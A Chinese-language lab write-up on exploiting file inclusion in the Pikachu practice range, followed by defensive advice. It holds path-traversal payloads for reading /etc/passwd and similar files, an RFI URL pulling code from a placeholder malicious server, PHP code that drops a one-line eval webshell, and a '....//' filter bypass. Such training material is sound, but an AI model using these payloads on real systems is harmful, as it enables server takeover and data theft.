Pikachu 靶场 File Inclusion 实战：从本地渗透到远程控制

1. 初识Pikachu靶场与File Inclusion漏洞

第一次接触Pikachu靶场时，我就被它精心设计的漏洞场景所吸引。这个开源的Web漏洞演练平台，用最简单直观的方式还原了真实网络环境中可能遇到的各种安全问题。其中File Inclusion（文件包含）漏洞尤其值得初学者重点关注，因为它不仅常见，而且危害极大。

文件包含漏洞就像一扇被粗心大意忘记上锁的后门。攻击者可以通过这扇门，读取服务器上的敏感文件，甚至直接执行恶意代码。我在实际渗透测试中遇到过不少这样的案例，有些网站仅仅因为一个简单的文件包含漏洞，就导致整个服务器沦陷。Pikachu靶场中的这个场景，完美模拟了从发现漏洞到最终控制服务器的完整攻击链。

2. 本地文件包含(LFI)实战演练

2.1 发现漏洞入口

打开Pikachu靶场的File Inclusion模块，首先看到的是一个球星选择页面。表面上这是个简单的信息展示功能，但仔细观察URL就会发现玄机。当我选择不同球星时，URL中的filename参数会随之变化，比如file1.php、file2.php等。

这种动态包含文件的设计，正是文件包含漏洞的典型特征。我尝试修改filename参数，输入一些特殊值来测试系统的反应。比如尝试包含系统文件：

http://靶场地址/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd

2.2 读取敏感文件

当发现可以穿越目录时，我立即尝试读取Windows系统下的hosts文件。这个文件记录了系统的域名解析规则，包含了很多敏感信息。使用如下路径：

../../../../Windows/System32/drivers/etc/hosts

成功读取到hosts文件内容后，我意识到这个漏洞的严重性。攻击者不仅可以获取系统配置信息，还能进一步探测服务器环境，为后续攻击做准备。

2.3 深入利用技巧

在实际渗透中，我还会尝试读取以下关键文件：

• /etc/passwd（Linux用户信息）
• /proc/self/environ（环境变量）
• 网站配置文件（如config.php）
• 日志文件（可能包含敏感信息）

通过这些信息，攻击者可以全面了解服务器环境，为后续攻击制定更精确的方案。

3. 远程文件包含(RFI)进阶攻击

3.1 从LFI到RFI的跨越

本地文件包含已经足够危险，但远程文件包含的杀伤力更大。RFI允许攻击者从远程服务器包含恶意代码，这相当于直接给攻击者开了执行任意代码的后门。

在Pikachu靶场中，我首先确认RFI功能是否开启。通过尝试包含一个远程URL来测试：

http://靶场地址/vul/fileinclude/fi_remote.php?filename=http://恶意服务器/shell.txt

3.2 制作并上传Webshell

确认RFI可用后，我准备了一个简单的PHP webshell。这个shell的功能很简单 - 它会创建一个新的PHP文件，内容是一句话木马：

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]) ?>'); ?>

将这个代码保存为txt文件，放在我的测试服务器上。然后通过RFI漏洞包含这个远程文件：

http://靶场地址/vul/fileinclude/fi_remote.php?filename=http://我的服务器/shell.txt

执行后，靶场服务器上就会生成一个shell.php文件，里面包含一句话木马。

3.3 获取服务器控制权

有了webshell之后，就可以使用中国蚁剑等工具连接服务器了。连接时需要填写：

• 服务器地址：靶场URL/shell.php
• 连接密码：cmd（与webshell中的POST参数一致）

成功连接后，就获得了服务器的完整控制权。可以浏览文件系统、执行命令、上传下载文件等。在实际攻击场景中，这意味着攻击者可以窃取数据、植入后门，甚至以该服务器为跳板攻击内网其他机器。

4. 漏洞防御与最佳实践

4.1 输入验证与过滤

作为开发者，首先要对所有用户输入进行严格验证。对于文件包含功能，应该：

• 限制包含的文件路径，禁止目录穿越符(../)
• 使用白名单机制，只允许包含特定目录下的文件
• 对输入进行规范化处理，防止多重编码绕过

4.2 服务器安全配置

从系统管理员角度，可以采取以下措施：

• 关闭allow_url_include（禁用远程文件包含）
• 设置open_basedir限制PHP可访问的目录
• 定期更新系统和应用软件，修补已知漏洞

4.3 监控与应急响应

即使采取了预防措施，也要做好被攻击的准备：

• 部署文件完整性监控，及时发现webshell
• 记录并分析Web服务器日志
• 准备应急响应预案，确保能快速恢复服务

5. 从靶场到实战的思考

在Pikachu靶场练习File Inclusion漏洞的过程中，我深刻体会到网络安全攻防的本质 - 它是一场永不停歇的猫鼠游戏。攻击者不断寻找新的突破口，防御者则需要时刻保持警惕。

记得有一次在实际渗透测试中，我遇到了一个看似简单的LFI漏洞。但当我尝试常规的../../目录穿越时，系统却返回了错误。经过多次尝试，发现开发人员只是简单过滤了../，却没想到攻击者可能会使用....//这样的变体。最终通过双重编码成功绕过了过滤，这再次证明了安全防御不能只做表面功夫。

对于初学者来说，Pikachu靶场提供了一个绝佳的学习平台。在这里犯错不会造成实际损失，但收获的经验却能让你在面对真实网络威胁时更加从容。建议每个想学习网络安全的人，都要从这些基础漏洞入手，真正理解漏洞原理，而不是只会使用现成的攻击工具。